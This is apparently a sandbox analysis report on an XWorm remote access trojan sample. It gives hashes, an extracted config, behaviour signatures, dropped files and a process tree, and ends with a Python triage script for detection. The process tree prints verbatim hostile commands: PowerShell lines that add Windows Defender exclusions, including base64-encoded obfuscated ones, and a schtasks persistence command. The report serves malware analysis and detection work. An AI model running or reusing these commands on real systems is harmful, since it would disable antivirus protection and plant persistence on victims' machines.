
Analysis

  • max time kernel
    149s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    05/09/2024, 01:07 (DD/MM/YYYY, i.e. 5 September 2024; the win7-20240903 image date rules out a May reading)

General

  • Target

    c9IDU7463.exe

  • Size

    971KB

  • MD5

    26efc684ddd0782b295a6ee4a76e3256

  • SHA1

    08cc73ef5c1b02e09765181a5acee1a7018dcffc

  • SHA256

    bf832f28b8d9f2ff077f691bd7e8a2cf46f3a4ac0ee8ee2d2f2944089abd20ab

  • SHA512

    20ba9e73514148613943db974cf88874907f9fe19e1cf5d81d9bf83ffbd233be80e925c62a5430a7ef69099e603ae54d60680020e0de58e632897f8c4aecfb49

  • SSDEEP

    24576:5tVd1nnqxDvo1QtHCX1LcsRt0ni/V27INjQL:5tVDnquatHCX1Lcs422kpQL

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:7000 (loopback: this build is configured to connect to the local machine, so no remote C2 traffic is possible from it as-is)

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, or processes. In this run every stage calls Add-MpPreference with -ExclusionPath and -ExclusionProcess: first for the System32 self-copy, then (via -EncodedCommand) for the whole user profile and system drive, and finally for the final payload and the scheduled-task path. Add-MpPreference needs administrative rights, so the exclusions only take effect if the sample runs elevated, and the Defender PowerShell module that provides the cmdlet ships with Windows 8.1 and later, so on this Windows 7 image it is not expected to succeed. The command lines are still the indicator to detect on; the same sample on a current Windows build would carve out those exclusions.

  • Deletes itself 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection. Here the two -EncodedCommand invocations carry base64-encoded UTF-16LE text padded with block comments holding random three-letter strings (<#ngt#>, <#ixh#>, ...). Decoded and stripped of the comments, both run Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force, i.e. they exclude the entire user profile and the whole system drive from Defender scanning.

  • Drops file in System32 directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution. Here the task "malware builder" is created with /sc minute /mo 1 /RL HIGHEST, so it re-launches C:\Users\Admin\AppData\Roaming\malware builder every minute at the highest available run level, which also restarts the implant whenever its process is killed.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\c9IDU7463.exe
    "C:\Users\Admin\AppData\Local\Temp\c9IDU7463.exe"
    1⤵
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2436
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Client Server Runtime Process.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2240
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Client Server Runtime Process.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1828
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpD079.tmp.bat""
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:2444
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:1224
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2132
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {A54C3C24-CC1C-4596-A0A6-9A2887C56A43} S-1-5-21-2872745919-2748461613-2989606286-1000:CCJBVTGQ\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2032
    • C:\Windows\System32\Client Server Runtime Process.exe
      "C:\Windows\System32\Client Server Runtime Process.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2108
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGkAeABoACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdQBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAYgBqACMAPgA="
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2056
      • C:\Users\Admin\AppData\Local\Temp\Windows Security.exe
        "C:\Users\Admin\AppData\Local\Temp\Windows Security.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:752
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAZQBuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAdQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAegB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdQBuACMAPgA="
          4⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3000
        • C:\Users\Admin\AppData\Local\Temp\Windows Security Notification.exe
          "C:\Users\Admin\AppData\Local\Temp\Windows Security Notification.exe"
          4⤵
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1544
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Windows Security Notification.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2352
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Notification.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2148
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\malware builder'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1596
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'malware builder'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1792
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "malware builder" /tr "C:\Users\Admin\AppData\Roaming\malware builder"
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2836
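The PowerShell exclusion and command-obfuscation signatures above, together with the schtasks persistence in the process tree, are the actionable parts of this report. The following Python is an added example, not tria.ge's or XWorm's code: it decodes the -EncodedCommand payloads from the tree (base64 of UTF-16LE text), strips the <#...#> comment padding, lists the Defender exclusions each Add-MpPreference call adds, and parses the schtasks /create command. The command lines are copied from the tree above as constructed input; the list of leading powershell.exe switches it skips, the set of -EncodedCommand prefixes it recognises, and the "every 5 minutes or more often" threshold for a high-frequency task are my assumptions.

```python
"""Triage of the process command lines above (added example, not tria.ge code).

Decodes powershell.exe -EncodedCommand payloads (base64 of UTF-16LE text),
removes the <# ... #> block comments used as padding in this report, extracts
the Windows Defender exclusions added with Add-/Set-MpPreference, and parses
the schtasks /create persistence command.  Assumption: one command line per
string, in the form the report prints them.
"""
import base64
import re

# Constructed sample input: command lines copied from the process tree above.
REPORT_CMDLINES = r"""
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Client Server Runtime Process.exe'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Client Server Runtime Process.exe'
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpD079.tmp.bat""
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGkAeABoACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdQBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAYgBqACMAPgA="
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\malware builder'
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "malware builder" /tr "C:\Users\Admin\AppData\Roaming\malware builder"
""".strip().splitlines()

PS_EXE = re.compile(r'^\s*(?:"[^"]*powershell\.exe"|\S*powershell\.exe)\s*', re.I)
# Leading powershell.exe switches that carry no script text (assumed list).
PS_SWITCH = re.compile(
    r'^-(?:executionpolicy|ep|ex)\s+\S+\s*|^-(?:windowstyle|w)\s+\S+\s*'
    r'|^-(?:noprofile|nop|noninteractive|noni|nologo|sta|mta)\s*|^-(?:command|c)\s*',
    re.I,
)
# -EncodedCommand and the shortened forms powershell.exe accepts for it (assumed list).
ENCODED = re.compile(r'-(?:e|ec|en|enc|encodedcommand)\s+"?([A-Za-z0-9+/=]+)"?', re.I)
BLOCK_COMMENT = re.compile(r'<#.*?#>', re.S)
MP_CMDLET = re.compile(r'\b(?:Add|Set)-MpPreference\b', re.I)
EXCLUSION = re.compile(r'''-Exclusion(Path|Process|Extension)\s+(@\([^)]*\)|'[^']*'|"[^"]*"|\S+)''', re.I)
SCHTASKS_CREATE = re.compile(r'schtasks(?:\.exe)?"?\s+/create\b', re.I)
SCHTASKS_ARG = re.compile(r'/(sc|mo|rl|tn|tr)\s+("[^"]*"|\S+)', re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None if there is none."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def strip_block_comments(script):
    """Remove <# ... #> comments and collapse the whitespace they leave behind."""
    return re.sub(r'\s+', ' ', BLOCK_COMMENT.sub(' ', script)).strip()


def powershell_script(cmdline):
    """Return the script a powershell.exe command line runs, or None for other binaries."""
    m = PS_EXE.match(cmdline)
    if not m:
        return None
    rest = cmdline[m.end():]
    decoded = decode_encoded_command(rest)
    if decoded is not None:
        return strip_block_comments(decoded)
    while True:  # drop leading switches until the inline script starts
        s = PS_SWITCH.match(rest)
        if not s:
            break
        rest = rest[s.end():]
    return strip_block_comments(rest)


def defender_exclusions(script):
    """List (kind, value) pairs for every exclusion an Add-/Set-MpPreference call adds."""
    if not MP_CMDLET.search(script):
        return []
    found = []
    for kind, raw in EXCLUSION.findall(script):
        # @(a,b) array literals expand to one exclusion per element.
        values = raw[2:-1].split(',') if raw.startswith('@(') else [raw]
        found += [(kind.capitalize(), v.strip().strip('\'"')) for v in values]
    return found


def scheduled_task(cmdline):
    """Parse the persistence-relevant fields of a schtasks /create command line, or None."""
    if not SCHTASKS_CREATE.search(cmdline):
        return None
    args = {k.lower(): v.strip('"') for k, v in SCHTASKS_ARG.findall(cmdline)}
    modifier = int(args['mo']) if args.get('mo', '').isdigit() else None
    task = {
        'name': args.get('tn'),
        'action': args.get('tr'),
        'schedule': args.get('sc', '').lower(),
        'modifier': modifier,
        'run_level': args.get('rl', 'LIMITED').upper(),
    }
    # Assumed threshold: a minute-based task firing every 5 minutes or more often.
    task['high_frequency'] = task['schedule'] == 'minute' and modifier is not None and modifier <= 5
    return task


def triage(cmdlines):
    """Apply every rule to each command line and return the findings in order."""
    findings = []
    for line in cmdlines:
        script = powershell_script(line)
        if script is not None:
            if decode_encoded_command(line) is not None:
                findings.append(('encoded_powershell', script))
            for kind, value in defender_exclusions(script):
                findings.append(('defender_exclusion', kind, value))
        task = scheduled_task(line)
        if task and task['high_frequency']:
            findings.append(('scheduled_task', task['run_level'], task['name'], task['action']))
    return findings


if __name__ == '__main__':
    for finding in triage(REPORT_CMDLINES):
        print(*finding, sep='\t')
```

Run against the six lines above it reports seven findings: the four plain-text exclusions, the decoded encoded command with its two array elements ($env:UserProfile and $env:SystemDrive) as separate Path exclusions, and the one-minute HIGHEST task. The same functions apply unchanged to Sysmon event 1 or EDR process-creation logs, where the command line field is what this parses.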

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\Windows Security Notification.exe

    Filesize

    114KB

    MD5

    d59bcf447ab9a90d1c6e9701d85d5700

    SHA1

    c7eff0f1d56e71a601cff1e161879ea520886a32

    SHA256

    50738407f70e37470182a0da6b44e78eb9cd2be3f7c43e066ea85f92388c79ae

    SHA512

    4a33de1700a6740c354d79b6e2f706dbc924805b6c8aae03d68cf17427e52a58e65a177622266f4d4e9d0d0904d8ab7a55af2576d555bcc5868b9084730e7180

  • C:\Users\Admin\AppData\Local\Temp\Windows Security.exe

    Filesize

    164KB

    MD5

    9efb0ca4f150666bedbc6ef91e0e6f4b

    SHA1

    13b140227e709d3a534d4158111c9256b14474b3

    SHA256

    5ff4fc5985d8d9877dd5b4abe081ee91681b187e99a466b802a8795fd9e500ab

    SHA512

    7e16155776a1431eda8da3b2fe134b52863c0917170dc64ded710c5133705a0c019c930f696d5972a0a63270f59900cfca4b776631c0b5442c62696db4f7ca36

  • C:\Users\Admin\AppData\Local\Temp\tmpD079.tmp.bat

    Filesize

    161B

    MD5

    85b198e0ceb42e8889a3431ab462862b

    SHA1

    2e8fd589d5f90ec3c2f245ef110da367ea79f2bb

    SHA256

    a386e2faba834a3fcbc453b9a7b7052172bafe7d4cd896a7d5afc34c3ed54a21

    SHA512

    883a102def4f360e5ced0933783ed583898b212a6d33d6b5aaabbc66614304862a1da526bcf1b77a3bdb7f36e3c9611d2aa83fe4d15e1fce0c4207a5464095b8

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    4f0e7ccd703c3fcd69deb7430a7c1ad4

    SHA1

    546d29162a2049e0f303e49e868d87bbf28c966b

    SHA256

    07267bdd7040491adeba7359298e6d2f7705e9fb26e3e2efcac128232f071d99

    SHA512

    d2429c6a250fda52ead3db49b5a510b0d09387c9bcee2d57a8c83d7c2a3d05dbf21d890cf42d700b328f4c971f9b5a51d57d7be0691c041e186b80397accb129

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    c61513dd7527e37e9c087a0f88fe04d1

    SHA1

    75eb2a959cd1a856578d528c0ccca2000dc17d96

    SHA256

    a5db6933d1889f0918ce2cbda2d90fc59b4848f59752f24c6673ec75cb10fa60

    SHA512

    9bcab283524db58c9b6ded3d18e48fe2d1ef29477d944e34335fda580b336f1a73638e8d61d2aa4dfbf70444fa1feebb10ead0f33178ff939abe09a0ec9667c7

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    cb9d70b4fd0ab956e11225408571ddf0

    SHA1

    14e11e12a44378d612e185152a967ede6e9644c5

    SHA256

    3c98d1e70f6d4a487698324a5225295e790ccc636a694fba48406610023e287c

    SHA512

    ad775e101034601d1a26b3ed6f5a231409befced88adf51c5bc3fb34e6cf346f96d0953f012d69d7c7cb712cf4c48412be9254d9a389d806e6be9b63bd1a0d33

  • C:\Windows\System32\Client Server Runtime Process.exe (same size and hashes as the submitted sample, i.e. a byte-identical self-copy; the name imitates csrss.exe, the Client Server Runtime Process, the path was excluded from Defender by the first stage before use, and the file was then started by taskeng.exe as a scheduled task)

    Filesize

    971KB

    MD5

    26efc684ddd0782b295a6ee4a76e3256

    SHA1

    08cc73ef5c1b02e09765181a5acee1a7018dcffc

    SHA256

    bf832f28b8d9f2ff077f691bd7e8a2cf46f3a4ac0ee8ee2d2f2944089abd20ab

    SHA512

    20ba9e73514148613943db974cf88874907f9fe19e1cf5d81d9bf83ffbd233be80e925c62a5430a7ef69099e603ae54d60680020e0de58e632897f8c4aecfb49

  • memory/752-40-0x0000000000AF0000-0x0000000000B1E000-memory.dmp

    Filesize

    184KB

  • memory/1544-56-0x0000000000030000-0x0000000000052000-memory.dmp

    Filesize

    136KB

  • memory/1828-14-0x000000001B4C0000-0x000000001B7A2000-memory.dmp

    Filesize

    2.9MB

  • memory/1828-15-0x0000000002890000-0x0000000002898000-memory.dmp

    Filesize

    32KB

  • memory/2108-32-0x0000000000220000-0x000000000031A000-memory.dmp

    Filesize

    1000KB

  • memory/2108-33-0x000000001AD70000-0x000000001AE38000-memory.dmp

    Filesize

    800KB

  • memory/2108-34-0x0000000000320000-0x000000000035C000-memory.dmp

    Filesize

    240KB

  • memory/2148-69-0x0000000001D20000-0x0000000001D28000-memory.dmp

    Filesize

    32KB

  • memory/2240-8-0x0000000001D60000-0x0000000001D68000-memory.dmp

    Filesize

    32KB

  • memory/2240-7-0x000000001B580000-0x000000001B862000-memory.dmp

    Filesize

    2.9MB

  • memory/2352-63-0x0000000002780000-0x0000000002788000-memory.dmp

    Filesize

    32KB

  • memory/2436-28-0x000007FEF5970000-0x000007FEF635C000-memory.dmp

    Filesize

    9.9MB

  • memory/2436-2-0x000007FEF5970000-0x000007FEF635C000-memory.dmp

    Filesize

    9.9MB

  • memory/2436-0-0x000007FEF5973000-0x000007FEF5974000-memory.dmp

    Filesize

    4KB

  • memory/2436-19-0x000007FEF5970000-0x000007FEF635C000-memory.dmp

    Filesize

    9.9MB

  • memory/2436-1-0x0000000000270000-0x000000000036A000-memory.dmp

    Filesize

    1000KB

  • memory/2436-18-0x000007FEF5973000-0x000007FEF5974000-memory.dmp

    Filesize

    4KB